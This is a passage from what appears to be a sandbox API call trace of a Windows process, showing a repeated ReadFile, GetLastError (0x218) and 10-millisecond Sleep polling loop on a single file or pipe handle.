	[0246.999] Sleep (dwMilliseconds=0xa) 
	[0247.044] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.044] GetLastError () returned 0x218
	[0247.044] Sleep (dwMilliseconds=0xa) 
	[0247.090] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.090] GetLastError () returned 0x218
	[0247.090] Sleep (dwMilliseconds=0xa) 
	[0247.105] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.105] GetLastError () returned 0x218
	[0247.105] Sleep (dwMilliseconds=0xa) 
	[0247.122] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.122] GetLastError () returned 0x218
	[0247.122] Sleep (dwMilliseconds=0xa) 
	[0247.137] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.137] GetLastError () returned 0x218
	[0247.137] Sleep (dwMilliseconds=0xa) 
	[0247.153] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.153] GetLastError () returned 0x218
	[0247.153] Sleep (dwMilliseconds=0xa) 
	[0247.214] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.214] GetLastError () returned 0x218
	[0247.215] Sleep (dwMilliseconds=0xa) 
	[0247.293] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.293] GetLastError () returned 0x218
	[0247.293] Sleep (dwMilliseconds=0xa) 
	[0247.339] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.339] GetLastError () returned 0x218
	[0247.339] Sleep (dwMilliseconds=0xa) 
	[0247.381] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.381] GetLastError () returned 0x218
	[0247.381] Sleep (dwMilliseconds=0xa) 
	[0247.386] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.386] GetLastError () returned 0x218
	[0247.387] Sleep (dwMilliseconds=0xa) 
	[0247.401] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.402] GetLastError () returned 0x218
	[0247.402] Sleep (dwMilliseconds=0xa) 
	[0247.417] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.417] GetLastError () returned 0x218
	[0247.417] Sleep (dwMilliseconds=0xa) 
	[0247.433] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.433] GetLastError () returned 0x218
	[0247.434] Sleep (dwMilliseconds=0xa) 
	[0247.449] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.449] GetLastError () returned 0x218
	[0247.449] Sleep (dwMilliseconds=0xa) 
	[0247.465] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.465] GetLastError () returned 0x218
	[0247.465] Sleep (dwMilliseconds=0xa) 
	[0247.481] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.482] GetLastError () returned 0x218
	[0247.482] Sleep (dwMilliseconds=0xa) 
	[0247.528] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.528] GetLastError () returned 0x218
	[0247.528] Sleep (dwMilliseconds=0xa) 
	[0247.568] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.568] GetLastError () returned 0x218
	[0247.568] Sleep (dwMilliseconds=0xa) 
	[0247.620] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.620] GetLastError () returned 0x218
	[0247.620] Sleep (dwMilliseconds=0xa) 
	[0247.647] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.647] GetLastError () returned 0x218
	[0247.647] Sleep (dwMilliseconds=0xa) 
	[0247.651] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.651] GetLastError () returned 0x218
	[0247.651] Sleep (dwMilliseconds=0xa) 
	[0247.666] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.666] GetLastError () returned 0x218
	[0247.667] Sleep (dwMilliseconds=0xa) 
	[0247.682] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.682] GetLastError () returned 0x218
	[0247.682] Sleep (dwMilliseconds=0xa) 
	[0247.697] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.698] GetLastError () returned 0x218
	[0247.698] Sleep (dwMilliseconds=0xa) 
	[0247.713] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.714] GetLastError () returned 0x218
	[0247.714] Sleep (dwMilliseconds=0xa) 
	[0247.729] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.729] GetLastError () returned 0x218
	[0247.729] Sleep (dwMilliseconds=0xa) 
	[0247.745] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.745] GetLastError () returned 0x218
	[0247.745] Sleep (dwMilliseconds=0xa) 
	[0247.792] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.792] GetLastError () returned 0x218
	[0247.792] Sleep (dwMilliseconds=0xa) 
	[0247.838] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.838] GetLastError () returned 0x218
	[0247.838] Sleep (dwMilliseconds=0xa) 
	[0247.885] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.885] GetLastError () returned 0x218
	[0247.885] Sleep (dwMilliseconds=0xa) 
	[0247.907] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.907] GetLastError () returned 0x218
	[0247.907] Sleep (dwMilliseconds=0xa) 
	[0247.939] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.939] GetLastError () returned 0x218
	[0247.939] Sleep (dwMilliseconds=0xa) 
	[0247.947] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.947] GetLastError () returned 0x218
	[0247.947] Sleep (dwMilliseconds=0xa) 
	[0247.963] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.963] GetLastError () returned 0x218
	[0247.963] Sleep (dwMilliseconds=0xa) 
	[0247.979] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.979] GetLastError () returned 0x218
	[0247.979] Sleep (dwMilliseconds=0xa) 
	[0247.994] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0247.994] GetLastError () returned 0x218
	[0247.994] Sleep (dwMilliseconds=0xa) 
	[0248.011] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.011] GetLastError () returned 0x218
	[0248.011] Sleep (dwMilliseconds=0xa) 
	[0248.058] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.058] GetLastError () returned 0x218
	[0248.058] Sleep (dwMilliseconds=0xa) 
	[0248.151] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.151] GetLastError () returned 0x218
	[0248.151] Sleep (dwMilliseconds=0xa) 
	[0248.229] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.229] GetLastError () returned 0x218
	[0248.229] Sleep (dwMilliseconds=0xa) 
	[0248.245] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.245] GetLastError () returned 0x218
	[0248.245] Sleep (dwMilliseconds=0xa) 
	[0248.260] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.260] GetLastError () returned 0x218
	[0248.260] Sleep (dwMilliseconds=0xa) 
	[0248.278] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.278] GetLastError () returned 0x218
	[0248.278] Sleep (dwMilliseconds=0xa) 
	[0248.291] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.291] GetLastError () returned 0x218
	[0248.292] Sleep (dwMilliseconds=0xa) 
	[0248.308] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.308] GetLastError () returned 0x218
	[0248.308] Sleep (dwMilliseconds=0xa) 
	[0248.324] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.324] GetLastError () returned 0x218
	[0248.325] Sleep (dwMilliseconds=0xa) 
	[0248.340] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.340] GetLastError () returned 0x218
	[0248.340] Sleep (dwMilliseconds=0xa) 
	[0248.354] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.354] GetLastError () returned 0x218
	[0248.355] Sleep (dwMilliseconds=0xa) 
	[0248.401] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.401] GetLastError () returned 0x218
	[0248.401] Sleep (dwMilliseconds=0xa) 
	[0248.447] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.447] GetLastError () returned 0x218
	[0248.447] Sleep (dwMilliseconds=0xa) 
	[0248.493] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.493] GetLastError () returned 0x218
	[0248.493] Sleep (dwMilliseconds=0xa) 
	[0248.509] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.509] GetLastError () returned 0x218
	[0248.509] Sleep (dwMilliseconds=0xa) 
	[0248.536] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.536] GetLastError () returned 0x218
	[0248.536] Sleep (dwMilliseconds=0xa) 
	[0248.541] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.541] GetLastError () returned 0x218
	[0248.541] Sleep (dwMilliseconds=0xa) 
	[0248.556] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.556] GetLastError () returned 0x218
	[0248.556] Sleep (dwMilliseconds=0xa) 
	[0248.572] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.572] GetLastError () returned 0x218
	[0248.572] Sleep (dwMilliseconds=0xa) 
	[0248.587] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.587] GetLastError () returned 0x218
	[0248.587] Sleep (dwMilliseconds=0xa) 
	[0248.602] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.602] GetLastError () returned 0x218
	[0248.602] Sleep (dwMilliseconds=0xa) 
	[0248.649] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.649] GetLastError () returned 0x218
	[0248.649] Sleep (dwMilliseconds=0xa) 
	[0248.696] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.696] GetLastError () returned 0x218
	[0248.696] Sleep (dwMilliseconds=0xa) 
	[0248.740] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.740] GetLastError () returned 0x218
	[0248.740] Sleep (dwMilliseconds=0xa) 
	[0248.743] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.743] GetLastError () returned 0x218
	[0248.743] Sleep (dwMilliseconds=0xa) 
	[0248.759] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.759] GetLastError () returned 0x218
	[0248.759] Sleep (dwMilliseconds=0xa) 
	[0248.774] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.774] GetLastError () returned 0x218
	[0248.774] Sleep (dwMilliseconds=0xa) 
	[0248.789] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.790] GetLastError () returned 0x218
	[0248.790] Sleep (dwMilliseconds=0xa) 
	[0248.812] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.812] GetLastError () returned 0x218
	[0248.812] Sleep (dwMilliseconds=0xa) 
	[0248.821] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.821] GetLastError () returned 0x218
	[0248.821] Sleep (dwMilliseconds=0xa) 
	[0248.837] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.837] GetLastError () returned 0x218
	[0248.837] Sleep (dwMilliseconds=0xa) 
	[0248.883] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.883] GetLastError () returned 0x218
	[0248.883] Sleep (dwMilliseconds=0xa) 
	[0248.930] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.930] GetLastError () returned 0x218
	[0248.930] Sleep (dwMilliseconds=0xa) 
	[0248.971] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.971] GetLastError () returned 0x218
	[0248.971] Sleep (dwMilliseconds=0xa) 
	[0248.977] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.977] GetLastError () returned 0x218
	[0248.977] Sleep (dwMilliseconds=0xa) 
	[0248.993] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0248.993] GetLastError () returned 0x218
	[0248.993] Sleep (dwMilliseconds=0xa) 
	[0249.008] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0249.008] GetLastError () returned 0x218
	[0249.008] Sleep (dwMilliseconds=0xa) 
	[0249.024] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0249.024] GetLastError () returned 0x218
	[0249.024] Sleep (dwMilliseconds=0xa) 
	[0249.039] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0249.039] GetLastError () returned 0x218
	[0249.039] Sleep (dwMilliseconds=0xa) 
	[0249.055] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0249.056] GetLastError () returned 0x218
	[0249.056] Sleep (dwMilliseconds=0xa) 
	[0249.071] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0249.071] GetLastError () returned 0x218
	[0249.071] Sleep (dwMilliseconds=0xa) 
